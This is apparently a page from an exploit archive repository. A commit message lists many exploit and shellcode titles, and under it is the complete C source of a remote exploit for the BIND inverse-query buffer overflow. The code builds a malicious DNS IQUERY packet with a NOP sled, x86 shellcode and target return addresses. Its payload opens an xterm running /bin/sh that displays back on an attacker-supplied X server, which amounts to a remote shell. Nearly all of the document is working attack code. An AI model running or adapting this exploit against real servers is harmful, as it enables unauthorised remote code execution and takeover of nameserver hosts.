880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
280 lines
No EOL
7.3 KiB
C
280 lines
No EOL
7.3 KiB
C
/*
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source: https://www.securityfocus.com/bid/134/info
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A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
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Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.
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*/
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/*
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* z, thnx.
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* ganked the xterm exec from adm, thnx.
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* have fun.
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* -prym
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*/
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#include <unistd.h>
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#include <stdio.h>
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#include <stdlib.h>
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#include <signal.h>
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#include <time.h>
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#include <string.h>
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#include <ctype.h>
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#include <sys/types.h>
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#include <sys/socket.h>
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#include <netinet/in.h>
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#include <arpa/inet.h>
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#include <arpa/nameser.h>
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#include <netdb.h>
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#define REMOTE
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#define DEFAULT_ANBUF_OFFSET 300
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#define DEFAULT_TARGET 0
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#define DEFAULT_OPTIMIZED 0
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#define DLEN_VAL 4
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#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
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#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
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#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
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#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
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#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)
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struct target_type
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{
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char desc[40];
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int systype;
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unsigned long addr;
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unsigned long opt_addr;
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};
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struct target_type target[] =
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{
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{"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
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{"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
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{"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
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{"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
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{"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
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{{0},0,0,0}
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};
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unsigned long resolve(char *host)
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{
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long i;
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struct hostent *he;
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if((i=inet_addr(host))<0)
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if((he=gethostbyname(host))==NULL)
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return(0);
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else
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return(*(unsigned long *)he->h_addr);
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return(i);
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}
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int send_packet(int fd, char *buff, int len)
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{
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char tmp[2], *ptr=tmp;
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PUTSHORT(len,ptr);
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if(write(fd,tmp,2)!=2)
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return(-1);
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if(write(fd,buff,len)!=len)
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return(-1);
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return(1);
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}
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int attack(int fd, struct in_addr us, struct target_type t,
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unsigned long offset, int optimized)
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{
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char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
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HEADER *dnsh=(HEADER *)buff;
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unsigned long i;
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int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;
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memset(dnsh,0,sizeof(HEADER));
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dnsh->id = htons(31337);
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dnsh->opcode = IQUERY;
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dnsh->rd = 1;
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dnsh->ra = 1;
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dnsh->ancount = htons(1);
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ptr += sizeof(HEADER);
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len += sizeof(HEADER);
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*ptr = '\0';
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ptr++;
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PUTSHORT(T_A,ptr);
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PUTSHORT(C_IN,ptr);
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PUTLONG(31337,ptr);
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dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
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PUTSHORT(dlen,ptr);
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len += PRE_OF_DATALEN;
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memset(ptr,'X',(sizeof(buff)-(ptr-buff)));
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if(t.systype==0)
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{
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#ifdef REMOTE
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char c1[] =
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"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
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"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
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"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
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"\x80\xe8\xcc\xff\xff\xff";
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char c2[] =
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"/usr/bin/X11/xterm\xff-display\xff";
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char c3[32];
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char c4[] =
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"\xfe\xe8\xb1\xff\xff\xff";
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snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));
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c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
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c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);
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i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);
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memset(ptr,0x90,i);
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memcpy((ptr+i),c1,strlen(c1));
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memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
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memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
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memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
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#else
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char c0de[] =
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"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
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"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
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"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
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int i = EVILSPACE-strlen(c0de);
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memset(ptr,0x90,i);
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memcpy((ptr+i),c0de,strlen(c0de));
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#endif
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}
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else
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return(0);
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if(!optimized)
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{
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memcpy((ptr+(dlen-16)),&al,sizeof(al));
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memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
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}
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i = (optimized?t.opt_addr:t.addr)+offset;
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memcpy((ptr+(dlen-4)),&i,sizeof(i));
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len += dlen;
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return(send_packet(fd,buff,len));
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}
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int main(int argc, char *argv[])
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{
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unsigned long offset=DEFAULT_ANBUF_OFFSET;
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int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
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struct sockaddr_in sa;
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struct in_addr xs;
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for(i=0;target[i].desc[0];i++);
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if(argc<3)
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{
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fprintf(stderr,"\ntarget types:\n");
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fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
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"description");
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for(target_index=0;target_index<i;target_index++)
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fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
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(unsigned int)target[target_index].addr,
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(unsigned int)target[target_index].opt_addr,
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target[target_index].desc);
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fprintf(stderr,
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"\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
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argv[0]);
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exit(-1);
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}
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if((argc>3)&&((target_index=atoi(argv[3]))>=i))
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{
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fprintf(stderr,"error: invalid target type %d\n",target_index);
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exit(-1);
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}
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if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
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{
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fprintf(stderr,"error: internal error\n");
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exit(-1);
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}
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if(argc>4)
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{
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optimized = atoi(argv[4]);
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if((optimized!=0)&&(optimized!=1))
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{
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fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
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exit(-1);
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}
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}
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if((optimized==0)&&(target[target_index].addr==0))
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optimized = 1;
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if((optimized==1)&&(target[target_index].opt_addr==0))
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optimized = 0;
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if(argc>5)
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offset = atoi(argv[5]);
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if(!(xs.s_addr=resolve(argv[2])))
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{
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fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
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exit(-1);
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}
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if(!(sa.sin_addr.s_addr=resolve(argv[1])))
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{
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fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
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exit(-1);
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}
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sa.sin_family = AF_INET;
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sa.sin_port = htons(53);
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if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
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{
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perror("error: socket");
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exit(-1);
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}
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if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
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{
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perror("error: connect");
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exit(-1);
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}
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printf("target : %s\n",inet_ntoa(sa.sin_addr));
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printf("target type : %s\n",target[target_index].desc);
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printf("optimized named : %s\n",(optimized?"YES":"NO"));
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printf("anbuff addr : 0x%x\n",(unsigned int)
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(optimized?target[target_index].opt_addr:target[target_index].addr));
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printf("anbuff addr offset : %lu\n",offset);
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printf("xterm display dest : %s:0\n",inet_ntoa(xs));
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printf("exploiting . . .\n");
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switch(attack(sock,xs,target[target_index],offset,optimized))
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{
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case -1:
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perror("error: attack");
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return(-1);
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break;
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case 0:
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fprintf(stderr,"error: internal error\n");
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return(-1);
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break;
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}
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if(close(sock)!=0)
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{
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perror("error: close");
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return(-1);
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}
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exit(0);
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} |